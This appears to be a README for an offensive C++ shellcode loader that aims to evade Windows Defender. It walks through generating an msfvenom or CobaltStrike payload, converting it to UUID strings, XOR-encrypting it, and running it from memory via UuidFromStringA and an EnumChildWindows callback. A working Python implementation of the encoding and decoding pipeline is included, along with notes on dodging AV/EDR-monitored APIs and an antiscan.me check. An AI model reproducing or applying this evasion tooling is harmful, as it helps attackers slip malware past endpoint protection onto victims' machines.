Introduction
Another shellcode injection technique using C++ that attempts to bypass Windows Defender using XOR encryption sorcery and UUID strings insanity :).
Shellcode generation
- Firstly, generate a payload in binary format (using either CobaltStrike or msfvenom). For instance, in msfvenom you can do it like so (the payload I am using is for illustration purposes, you can use whatever payload you want): msfvenom -p windows/messagebox -f raw -o shellcode.bin
- Then convert the shellcode (in binary/raw format) into UUID string format using the Python3 script bin_to_uuid.py: ./bin_to_uuid.py -p shellcode.bin > uuid.txt
- xor encrypt the UUID strings in uuid.txt using the Python3 script xor_encryptor.py: ./xor_encryptor.py uuid.txt > xor_crypted_out.txt
- Copy the C-style array from the file xor_crypted_out.txt and paste it into the C++ file as an array of unsigned char, i.e. unsigned char payload[]{your_output_from_xor_crypted_out.txt}
Execution
This shellcode injection technique involves the following steps:
- First things first, it allocates virtual memory for payload execution and residence via VirtualAlloc.
- It xor decrypts the payload using the xor key value.
- It uses UuidFromStringA to convert the UUID strings into their binary representation and store them in the previously allocated memory. This avoids the use of suspicious APIs like WriteProcessMemory or memcpy.
- It uses EnumChildWindows to execute the payload previously loaded into memory (in step 1), passing the address of that memory as the enumeration callback.
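Here is an added worked example (not the repo's bin_to_uuid.py, xor_encryptor.py or C++ loader) that models both the generation steps above and the loader's decode step in Python, so it runs offline on any OS. It assumes a repeating-key XOR over the ASCII UUID text with a hypothetical key, NUL-terminated strings laid out back to back, and 0x90 padding of the final chunk; the sample "shellcode" is a constructed byte string, not a payload. The point it shows that the steps alone do not: UuidFromStringA fills a GUID struct whose first three fields are little-endian, so the UUID text must be built from the little-endian view of each 16-byte chunk (Python's uuid.UUID(bytes_le=...)), or the bytes that land in the VirtualAlloc'd buffer will not be the shellcode you started with. VirtualAlloc and EnumChildWindows themselves are not modeled.

```python
import struct
import uuid

# Constructed sample "shellcode": NOT a real payload, just 20 distinct bytes so
# that any byte-order mistake in the UUID conversion shows up immediately.
SAMPLE_SHELLCODE = bytes(range(0x41, 0x41 + 20))

# Hypothetical XOR key; the repo's xor_encryptor.py keeps its own in KEY.
KEY = b"s3cr3t"

# Assumed padding byte for the last partial 16-byte chunk (a NOP, harmless if
# control ever reaches it). UuidFromStringA always yields 16 bytes per string.
PAD = 0x90


def xor_bytes(data, key):
    """Repeating-key XOR; the same function encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def bin_to_uuids(data, little_endian=True):
    """Split raw shellcode into 16-byte chunks and render each as a UUID string.

    UuidFromStringA writes a GUID struct whose Data1 (uint32), Data2 and Data3
    (uint16) fields are stored little-endian, so the text has to be produced
    from the little-endian view of each chunk (bytes_le) for the bytes that
    land in memory to equal the original shellcode. little_endian=False is the
    wrong way round and exists only for comparison.
    """
    if len(data) % 16:
        data += bytes([PAD]) * (16 - len(data) % 16)
    out = []
    for i in range(0, len(data), 16):
        chunk = data[i:i + 16]
        u = uuid.UUID(bytes_le=chunk) if little_endian else uuid.UUID(bytes=chunk)
        out.append(str(u))
    return out


def uuids_to_blob(uuids):
    """Lay the UUID strings out back to back, each NUL-terminated, which is the
    form the loader walks one string at a time (assumed layout)."""
    return b"".join(u.encode("ascii") + b"\x00" for u in uuids)


def to_c_array(blob, name="payload"):
    """Render bytes as the C-style array that gets pasted into the C++ file."""
    body = ", ".join("0x%02x" % b for b in blob)
    return "unsigned char %s[] = { %s };" % (name, body)


def build_payload(data, key, little_endian=True):
    """Whole generation pipeline: bin -> UUID text -> XOR -> bytes for the C array."""
    return xor_bytes(uuids_to_blob(bin_to_uuids(data, little_endian)), key)


def uuid_from_string_a(text):
    """Model of what UuidFromStringA leaves in memory: parse the text and pack
    the GUID struct as Windows stores it (little-endian Data1/Data2/Data3,
    then the 8 Data4 bytes verbatim). Equivalent to uuid.UUID(text).bytes_le."""
    u = uuid.UUID(text)
    return struct.pack("<IHH8s", u.time_low, u.time_mid, u.time_hi_version, u.bytes[8:])


def loader_decode(encrypted, key):
    """Model of the loader's decode step: XOR-decrypt the array, then feed each
    UUID string to UuidFromStringA so the 16-byte results are written
    contiguously into the (here simulated) VirtualAlloc'd buffer."""
    buf = bytearray()
    for s in xor_bytes(encrypted, key).split(b"\x00"):
        if s:
            buf += uuid_from_string_a(s.decode("ascii"))
    return bytes(buf)


if __name__ == "__main__":
    enc = build_payload(SAMPLE_SHELLCODE, KEY)
    print(to_c_array(enc))
    loaded = loader_decode(enc, KEY)
    print("round trip ok:", loaded[:len(SAMPLE_SHELLCODE)] == SAMPLE_SHELLCODE)
    wrong = loader_decode(build_payload(SAMPLE_SHELLCODE, KEY, little_endian=False), KEY)
    print("big-endian conversion matches:", wrong[:len(SAMPLE_SHELLCODE)] == SAMPLE_SHELLCODE)
```

Running it prints the C array you would paste into the loader and a round-trip check; the little_endian=False path only exists to show that a naive big-endian conversion swaps the first eight bytes of every chunk and would corrupt the payload.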
Why
- It doesn't use standard functions like memcpy or WriteProcessMemory, which are known to raise alarms with AVs/EDRs. Instead, this program uses the Windows API function UuidFromStringA, which can be used to decode data as well as write it to memory (Isn't that great, folks? And please don't say "NO!" 🙂).
- It uses the function call obfuscation trick to call the Windows API functions.
- Lastly, because it looks unique 🙂 (Isn't it? 🙂)
Notes
- You have to change the xor key (line 86) to whatever you wish. This can be done in the ./xor_encryptor.py Python3 script by changing the KEY variable (the loader must decrypt with the same key).
- You have to change the default executable filename value (line 90) to your filename.
- The command for compiling is provided in the C++ file (near the top). NB: mingw was used, but you can use whichever compiler you prefer. 🙂
Compile
The binary was scanned using antiscan.me on 01/08/2022.
https://analysis.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/